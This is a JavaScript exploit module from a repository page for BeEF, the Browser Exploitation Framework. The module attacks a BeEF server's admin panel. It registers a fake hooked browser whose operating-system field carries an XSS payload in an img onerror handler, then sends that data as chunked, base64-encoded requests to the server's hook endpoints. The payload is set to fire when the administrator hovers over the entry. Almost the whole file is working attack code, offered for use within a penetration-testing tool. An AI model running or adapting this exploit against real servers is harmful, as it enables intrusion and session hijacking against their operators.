Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
39dd7e1d2d514092951896bee9fa8091a48959f9
beef/modules/exploits/beef_admin_panel_xss/command.js
zinduolis 6409891724 eliminate escaping issues
2026-01-21 15:32:44 +10:00

169 lines
5.9 KiB
JavaScript
Raw Blame History

//
// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var target_beef_url = "<%= @target_beef_url.to_s.gsub('"', '\\"') %>";
var xss_payload = "<%= @xss_payload.to_s.gsub('\\', '\\\\\\\\').gsub('"', '\\"').gsub("'", "\\\\'") %>";
// Generate a random session ID (80 characters, uppercase + digits)
function generateHookId() {
var chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
var result = '';
for (var i = 0; i < 80; i++) {
result += chars.charAt(Math.floor(Math.random() * chars.length));
}
return result;
}
// Get current timestamp in milliseconds
function ts() {
return Date.now();
}
// Split string into chunks
function chunkString(str, length) {
var chunks = [];
for (var i = 0; i < str.length; i += length) {
chunks.push(str.substring(i, i + length));
}
return chunks;
}
// Base64 encode (using browser's btoa)
function b64encode(str) {
return btoa(str);
}
var HOOK = generateHookId();
// Build the malicious payload - XSS is injected into host.os.name
// Note: the payload is wrapped in the img onerror handler
var malicious_os_name = "Linux<img src=x onError=" + xss_payload + ">";
var browser_data = [{
"cid": 0,
"results": {
"browser.window.cookies": "BEEFHOOK=" + HOOK,
"browser.name": "FFAA",
"browser.version": "146.0",
"browser.engine": "Gecko",
"browser.name.reported": "Mozilla/5.0 (X11; Linux x86_64; rv:146.0) Gecko/20100101 Firefox/146.0",
"browser.platform": "Linux x86_64",
"browser.language": "en-US",
"browser.plugins": "PDF Viewer-v.undefined",
"browser.window.title": "Unknown",
"browser.window.origin": "http://exploited-host:8000",
"browser.window.hostname": "exploited-host",
"browser.window.hostport": "8000",
"browser.window.uri": "http://exploited-host:8000/victim.html",
"browser.window.referrer": "http://exploited-host:8000/victim.html",
"browser.window.size.width": 1678,
"browser.window.size.height": 168,
"browser.date.datestamp": "Fri Jan 16 2026 23:34:24 GMT+1000 (Australian Eastern Standard Time)",
"host.os.name": malicious_os_name,
"host.os.family": "Linux",
"host.os.arch": 64,
"host.software.defaultbrowser": "Unknown",
"hardware.type": "Unknown",
"hardware.memory": "unknown",
"hardware.gpu": "unknown",
"hardware.gpu.vendor": "unknown",
"hardware.cpu.arch": "x86_64",
"hardware.cpu.cores": 32,
"hardware.battery.chargingstatus": "unknown",
"hardware.battery.level": "unknown",
"hardware.battery.chargingtime": "unknown",
"hardware.battery.dischargingtime": "unknown",
"hardware.screen.size.width": 5120,
"hardware.screen.size.height": 2160,
"hardware.screen.colordepth": 24,
"hardware.screen.touchenabled": "No",
"browser.capabilities.vbscript": "No",
"browser.capabilities.flash": "No",
"browser.capabilities.silverlight": "No",
"browser.capabilities.phonegap": "No",
"browser.capabilities.websocket": "Yes",
"browser.capabilities.webrtc": "No",
"browser.capabilities.webworker": "Yes",
"browser.capabilities.webgl": "No",
"browser.capabilities.googlegears": "No",
"browser.capabilities.activex": "No",
"browser.capabilities.quicktime": "No",
"browser.capabilities.realplayer": "No",
"browser.capabilities.wmp": "No",
"browser.capabilities.vlc": "No",
"HookSessionID": HOOK
},
"status": 0,
"handler": "/init"
}];
var encoded_data = b64encode(JSON.stringify(browser_data));
var chunks = chunkString(encoded_data, 383);
beef.debug("[BeEF Admin Panel XSS] Sending malicious hook registration to: " + target_beef_url);
beef.debug("[BeEF Admin Panel XSS] Generated Hook ID: " + HOOK);
beef.debug("[BeEF Admin Panel XSS] Payload chunks: " + chunks.length);
var requests_sent = 0;
var requests_completed = 0;
var total_requests = (2 * chunks.length) + 2; // 2 rounds of chunks + hook.js + final dh
function checkComplete() {
if (requests_completed >= total_requests) {
beef.net.send("<%= @command_url %>", <%= @command_id %>,
"result=Exploit sent successfully. Fake browser registered with Hook ID: " + HOOK +
". XSS will trigger when admin hovers over the browser entry in the Hooked Browsers list.",
beef.are.status_success());
}
}
// Send chunks for session IDs 1 and 2
for (var sid = 1; sid <= 2; sid++) {
for (var idx = 0; idx < chunks.length; idx++) {
(function(s, i, chunk) {
var url = target_beef_url + "/dh?bh=" + HOOK + "&sid=" + s + "&pid=" + (i + 1) + "&pc=" + chunks.length + "&d=" + encodeURIComponent(chunk) + "&_=" + ts();
var img = new Image();
img.onload = img.onerror = function() {
requests_completed++;
checkComplete();
};
img.src = url;
requests_sent++;
})(sid, idx, chunks[idx]);
}
}
// Send hook.js request after a short delay
setTimeout(function() {
var hookUrl = target_beef_url + "/hook.js?BEEFHOOK=" + HOOK + "&_=" + ts();
var img2 = new Image();
img2.onload = img2.onerror = function() {
requests_completed++;
checkComplete();
};
img2.src = hookUrl;
requests_sent++;
// Send final dh request
setTimeout(function() {
var finalChunk = chunks[chunks.length - 1] || "";
var finalUrl = target_beef_url + "/dh?bh=" + HOOK + "&sid=3&pid=1&pc=1&d=" + encodeURIComponent(finalChunk) + "&_=" + ts();
var img3 = new Image();
img3.onload = img3.onerror = function() {
requests_completed++;
checkComplete();
};
img3.src = finalUrl;
requests_sent++;
}, 100);
}, 500);
beef.debug("[BeEF Admin Panel XSS] Initiated " + requests_sent + " requests");
});
Reference in New Issue View Git Blame Copy Permalink